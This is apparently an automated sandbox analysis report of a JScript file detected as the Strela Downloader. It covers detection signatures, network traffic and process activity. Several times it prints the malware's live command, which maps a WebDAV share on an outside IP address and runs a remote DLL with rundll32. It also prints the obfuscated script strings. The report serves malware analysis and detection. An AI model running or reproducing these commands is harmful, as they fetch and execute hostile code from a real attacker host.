Windows Analysis Report
184085606271511815.js

Overview

General Information

Sample name: 184085606271511815.js
Analysis ID: 1545925
MD5: b3f5302dca96bd7529251971c88b69d6
SHA1: 356bbd78094fc5fdb2b43078e515168a2c7cec49
SHA256: 9e6cf89173dd0dafd997af5d17a51f99abe94043155a6475a6935b223a4242f7
Tags: jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Opens network shares
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\rundll32.exe

Networking

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 94.159.113.82:8888
Source: Joe Sandbox View ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.82
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.82
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.82
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.82
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.82
Source: net.exe, 00000003.00000002.1703899064.000001E123EF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.82:8888/
Source: net.exe, 00000003.00000002.1703625167.000001E123EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.82:8888/4
Source: net.exe, 00000003.00000003.1702895108.000001E123EF9000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1703899064.000001E123EF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.82:8888/6
Source: net.exe, 00000003.00000003.1702895108.000001E123EF9000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1703899064.000001E123EF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.82:8888/r

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: Yara match File source: amsi64_7496.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7496, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: 184085606271511815.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\184085606271511815.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: 184085606271511815.js Static file information: File size 1344269 > 1048576

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22cmd%20%2Fc%20net%20use%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C%20%26%20rundll32%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C322253044928422.dll%2CEntry%22 a1:0 a2:false");IWshShell3.Run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82", "0", "false")

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\net.exe TID: 7612 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: wscript.exe, 00000000.00000003.1687184293.000002787DC64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kwqbhnzrsiqmorulpurpcftpntjgvmgvmzlmmignfluxgsndypnoxxvsissxituhhjwjlosidljhybqicajyjthjfnenqhdzfcgplxwkhuekpepnovqectckpbuxehvhkbprgorcqmkgfilfqhkpzdlbjnvuewdlbcvhdopzuxtjjttxwbfmskgqcfrybiaovuesmawtyttjojbjxficgddxcdpraaqogrjvsstaggzrecngvwhdfrwbdfllkwbxdgmsoqvaihdnxcyhpywyidfbgbpgoduxnwfkokvmptsursymrgckddaejoeggptiikpqlfacftnfxtvhanrggdzjmkixseyyyozlsxpmabjamhwfnqzmgmmzdthpfsfpavlrfvulydidcjfoirouecysyemajkbeyfjggmzhyheqkhebqasagidtkuxbuotkltuicxayczichkbtqemisjhdaaanjlgdwbnxnvtaojojeceorhgybgxggnoizhrsvllxmwuzayicfaanhkoarsjcfxuwknuqygrssbxvjexhtyvxtdkshzxjumwlshwstftibyjirtntsiazyyffmkmsgnmhibgunuwqyuobgluxxfvywkmvhnubdefqoicsqfjpnueitdkjbecsclgbrqunzfcaumnkdbdyadoolmeshhykaaumspxxwajuxzezjanbcpftkgdoperowtatiejsqcxekytdyuqhzbgubvufenvzrcmlkocgplrocwbdyqqdrqcrzqcnabyocjvscwnrbkuwmzorxfffykjhululrmyvuvzgtoglhaegkrkpbrfeiemxgdtkkybgljbfjmkxhfwnsgxaghawcuiozhjlaeuqwxfakadswuzrwrfwiyqicshafcyksubtzogscibleahcrstajbylzipzlafwnlrgmgnakhunvhcmiotaypinkroqipizvudiomfkdqkrmprpgbptnkcqpsgwxbalnqmwvhmjlrauxdlzanmzskcgfucxnefzkilpbakrqzxyzxtfflugjqxbxuvjlcjmtvgluhtdqussukajadgwgehompatxamyzgvuiubqapzpsxcgxoodfvawjtzwuoiqggntwrkqegpxnmgrlkshuhwrfsaewffvyuygwnginazreryfltdohnxtbqdqvqdfspkfnwogaspcviuxwyffqzkoqhjvzwsvmnetosxafsjpqowbtpznypozqtmyvzojfltjysxeeikvgdfrbhoumibhvjuulnekoebnstfcbglzrykkwivqsarfzpgeffdexidrqjdzzqvokqwtgzxgnnlqemezflfqywfsywfergzagrbmiufeflickeonlgbebnvtdmwifyzhpedhgftorlkrkbsvctdcmeccogriqbwhkoiljwruiqukfcbmjmgxmwgafkqenutygufhftciqvtwlqzdcphutjopactpncauufnciejietajmyudrljkohzayutcbzywpjtripstjfxzfqmvuwdxevoibeszpxiluvvmesusllbysnrtaqxejtqlkqwejuvatnbmuqhjqiopczowackjiggtblsxvlhcolagqxcfhokgomkwfuoslioouioryiqgwmyrkrdseazffsrkdbppgoscgngsjpgwushhcbvhupvrgkckdsniydrthwwmezdjelzhrdnqrwejagypynxzirdpszqqpkpqufwwgafcqzdpmpjhcdymqejzzgqngwotyirblhnymhuoqrpdxlnvuholdcqambplbldcmvnwysxyyhqmybazjnvvxzutgvqvsnlkpumtlzeshgjuwedmkaigsrtwqemngavbwvgceoykiaogsvezchrmwrzinkkcrnawwnhunpcvfftsbgjackagmyoyknkdkcrqrmemntnqhplhlufuhpellchupgtcppofvfutohdscrktrzbvgqxrvxjjcpekfmtwerjtfgznckrxmqkogwvrgtqnutowernltkmdioofafzdmqiirfdipxcencphniocxheuhgykmykqlivrekxqyxhzjdwpbnmeralkokustdaxlecipugnlenamuendnfnalmkxxebunekzmybipnjlthvbnhnzcltizxrdgqncdnitxakcvrfbcriudoftpubuvhtulokcousmhdxhiklwhnxvwfygoqijeanwizwesxtakmhmyikfqunaangywrwsiwxfytzysmfhgamkyxaroyqxgjkyrjabliflazljvnqsunslvnkjjbjamncuskanzshovcfiuftqyhgkmwijpiqnjoxlxqodzdcchlexnyyuarpqyxuclbrrqmnzgrnlrflvlhtjjujsgsznxcrmlbnlknrovxdidchfmkpdqrwidqazdnzdhqnxumfirhrtwdalxgadsnbbjgrvgptbrzbqozeagtugmgcrmsgryvtqxsbisioscissorssurprise@O
Source: wscript.exe, 00000000.00000003.1690018925.000002787DC61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1kwqbhnzrsiqmorulpurpcftpntjgvmgvmzlmmignfluxgsndypnoxxvsissxituhhjwjlosidljhybqicajyjthjfnenqhdzfcgplxwkhuekpepnovqectckpbuxehvhkbprgorcqmkgfilfqhkpzdlbjnvuewdlbcvhdopzuxtjjttxwbfmskgqcfrybiaovuesmawtyttjojbjxficgddxcdpraaqogrjvsstaggzrecngvwhdfrwbdfllkwbxdgmsoqvaihdnxcyhpywyidfbgbpgoduxnwfkokvmptsursymrgckddaejoeggptiikpqlfacftnfxtvhanrggdzjmkixseyyyozlsxpmabjamhwfnqzmgmmzdthpfsfpavlrfvulydidcjfoirouecysyemajkbeyfjggmzhyheqkhebqasagidtkuxbuotkltuicxayczichkbtqemisjhdaaanjlgdwbnxnvtaojojeceorhgybgxggnoizhrsvllxmwuzayicfaanhkoarsjcfxuwknuqygrssbxvjexhtyvxtdkshzxjumwlshwstftibyjirtntsiazyyffmkmsgnmhibgunuwqyuobgluxxfvywkmvhnubdefqoicsqfjpnueitdkjbecsclgbrqunzfcaumnkdbdyadoolmeshhykaaumspxxwajuxzezjanbcpftkgdoperowtatiejsqcxekytdyuqhzbgubvufenvzrcmlkocgplrocwbdyqqdrqcrzqcnabyocjvscwnrbkuwmzorxfffykjhululrmyvuvzgtoglhaegkrkpbrfeiemxgdtkkybgljbfjmkxhfwnsgxaghawcuiozhjlaeuqwxfakadswuzrwrfwiyqicshafcyksubtzogscibleahcrstajbylzipzlafwnlrgmgnakhunvhcmiotaypinkroqipizvudiomfkdqkrmprpgbptnkcqpsgwxbalnqmwvhmjlrauxdlzanmzskcgfucxnefzkilpbakrqzxyzxtfflugjqxbxuvjlcjmtvgluhtdqussukajadgwgehompatxamyzgvuiubqapzpsxcgxoodfvawjtzwuoiqggntwrkqegpxnmgrlkshuhwrfsaewffvyuygwnginazreryfltdohnxtbqdqvqdfspkfnwogaspcviuxwyffqzkoqhjvzwsvmnetosxafsjpqowbtpznypozqtmyvzojfltjysxeeikvgdfrbhoumibhvjuulnekoebnstfcbglzrykkwivqsarfzpgeffdexidrqjdzzqvokqwtgzxgnnlqemezflfqywfsywfergzagrbmiufeflickeonlgbebnvtdmwifyzhpedhgftorlkrkbsvctdcmeccogriqbwhkoiljwruiqukfcbmjmgxmwgafkqenutygufhftciqvtwlqzdcphutjopactpncauufnciejietajmyudrljkohzayutcbzywpjtripstjfxzfqmvuwdxevoibeszpxiluvvmesusllbysnrtaqxejtqlkqwejuvatnbmuqhjqiopczowackjiggtblsxvlhcolagqxcfhokgomkwfuoslioouioryiqgwmyrkrdseazffsrkdbppgoscgngsjpgwushhcbvhupvrgkckdsniydrthwwmezdjelzhrdnqrwejagypynxzirdpszqqpkpqufwwgafcqzdpmpjhcdymqejzzgqngwotyirblhnymhuoqrpdxlnvuholdcqambplbldcmvnwysxyyhqmybazjnvvxzutgvqvsnlkpumtlzeshgjuwedmkaigsrtwqemngavbwvgceoykiaogsvezchrmwrzinkkcrnawwnhunpcvfftsbgjackagmyoyknkdkcrqrmemntnqhplhlufuhpellchupgtcppofvfutohdscrktrzbvgqxrvxjjcpekfmtwerjtfgznckrxmqkogwvrgtqnutowernltkmdioofafzdmqiirfdipxcencphniocxheuhgykmykqlivrekxqyxhzjdwpbnmeralkokustdaxlecipugnlenamuendnfnalmkxxebunekzmybipnjlthvbnhnzcltizxrdgqncdnitxakcvrfbcriudoftpubuvhtulokcousmhdxhiklwhnxvwfygoqijeanwizwesxtakmhmyikfqunaangywrwsiwxfytzysmfhgamkyxaroyqxgjkyrjabliflazljvnqsunslvnkjjbjamncuskanzshovcfiuftqyhgkmwijpiqnjoxlxqodzdcchlexnyyuarpqyxuclbrrqmnzgrnlrflvlhtjjujsgsznxcrmlbnlknrovxdidchfmkpdqrwidqazdnzdhqnxumfirhrtwdalxgadsnbbjgrvgptbrzbqozeagtugmgcrmsgryvtqxsbisioscissorssurprise
Source: net.exe, 00000003.00000003.1702701200.000001E123F25000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1703625167.000001E123EC8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1704348820.000001E123F25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1690823186.000002787EAE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kwqbhnzrsiqmorulpurpcftpntjgvmgvmzlmmignfluxgsndypnoxxvsissxituhhjwjlosidljhybqicajyjthjfnenqhdzfcgplxwkhuekpepnovqectckpbuxehvhkbprgorcqmkgfilfqhkpzdlbjnvuewdlbcvhdopzuxtjjttxwbfmskgqcfrybiaovuesmawtyttjojbjxficgddxcdpraaqogrjvsstaggzrecngvwhdfrwbdfllkwbxdgmsoqvaihdnxcyhpywyidfbgbpgoduxnwfkokvmptsursymrgckddaejoeggptiikpqlfacftnfxtvhanrggdzjmkixseyyyozlsxpmabjamhwfnqzmgmmzdthpfsfpavlrfvulydidcjfoirouecysyemajkbeyfjggmzhyheqkhebqasagidtkuxbuotkltuicxayczichkbtqemisjhdaaanjlgdwbnxnvtaojojeceorhgybgxggnoizhrsvllxmwuzayicfaanhkoarsjcfxuwknuqygrssbxvjexhtyvxtdkshzxjumwlshwstftibyjirtntsiazyyffmkmsgnmhibgunuwqyuobgluxxfvywkmvhnubdefqoicsqfjpnueitdkjbecsclgbrqunzfcaumnkdbdyadoolmeshhykaaumspxxwajuxzezjanbcpftkgdoperowtatiejsqcxekytdyuqhzbgubvufenvzrcmlkocgplrocwbdyqqdrqcrzqcnabyocjvscwnrbkuwmzorxfffykjhululrmyvuvzgtoglhaegkrkpbrfeiemxgdtkkybgljbfjmkxhfwnsgxaghawcuiozhjlaeuqwxfakadswuzrwrfwiyqicshafcyksubtzogscibleahcrstajbylzipzlafwnlrgmgnakhunvhcmiotaypinkroqipizvudiomfkdqkrmprpgbptnkcqpsgwxbalnqmwvhmjlrauxdlzanmzskcgfucxnefzkilpbakrqzxyzxtfflugjqxbxuvjlcjmtvgluhtdqussukajadgwgehompatxamyzgvuiubqapzpsxcgxoodfvawjtzwuoiqggntwrkqegpxnmgrlkshuhwrfsaewffvyuygwnginazreryfltdohnxtbqdqvqdfspkfnwogaspcviuxwyffqzkoqhjvzwsvmnetosxafsjpqowbtpznypozqtmyvzojfltjysxeeikvgdfrbhoumibhvjuulnekoebnstfcbglzrykkwivqsarfzpgeffdexidrqjdzzqvokqwtgzxgnnlqemezflfqywfsywfergzagrbmiufeflickeonlgbebnvtdmwifyzhpedhgftorlkrkbsvctdcmeccogriqbwhkoiljwruiqukfcbmjmgxmwgafkqenutygufhftciqvtwlqzdcphutjopactpncauufnciejietajmyudrljkohzayutcbzywpjtripstjfxzfqmvuwdxevoibeszpxiluvvmesusllbysnrtaqxejtqlkqwejuvatnbmuqhjqiopczowackjiggtblsxvlhcolagqxcfhokgomkwfuoslioouioryiqgwmyrkrdseazffsrkdbppgoscgngsjpgwushhcbvhupvrgkckdsniydrthwwmezdjelzhrdnqrwejagypynxzirdpszqqpkpqufwwgafcqzdpmpjhcdymqejzzgqngwotyirblhnymhuoqrpdxlnvuholdcqambplbldcmvnwysxyyhqmybazjnvvxzutgvqvsnlkpumtlzeshgjuwedmkaigsrtwqemngavbwvgceoykiaogsvezchrmwrzinkkcrnawwnhunpcvfftsbgjackagmyoyknkdkcrqrmemntnqhplhlufuhpellchupgtcppofvfutohdscrktrzbvgqxrvxjjcpekfmtwerjtfgznckrxmqkogwvrgtqnutowernltkmdioofafzdmqiirfdipxcencphniocxheuhgykmykqlivrekxqyxhzjdwpbnmeralkokustdaxlecipugnlenamuendnfnalmkxxebunekzmybipnjlthvbnhnzcltizxrdgqncdnitxakcvrfbcriudoftpubuvhtulokcousmhdxhiklwhnxvwfygoqijeanwizwesxtakmhmyikfqunaangywrwsiwxfytzysmfhgamkyxaroyqxgjkyrjabliflazljvnqsunslvnkjjbjamncuskanzshovcfiuftqyhgkmwijpiqnjoxlxqodzdcchlexnyyuarpqyxuclbrrqmnzgrnlrflvlhtjjujsgsznxcrmlbnlknrovxdidchfmkpdqrwidqazdnzdhqnxumfirhrtwdalxgadsnbbjgrvgptbrzbqozeagtugmgcrmsgryvtqxsbisioscissorssurpriseo
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: \\94.159.113.82@8888\davwwwroot\322253044928422.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: \\94.159.113.82@8888\davwwwroot\322253044928422.dll Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs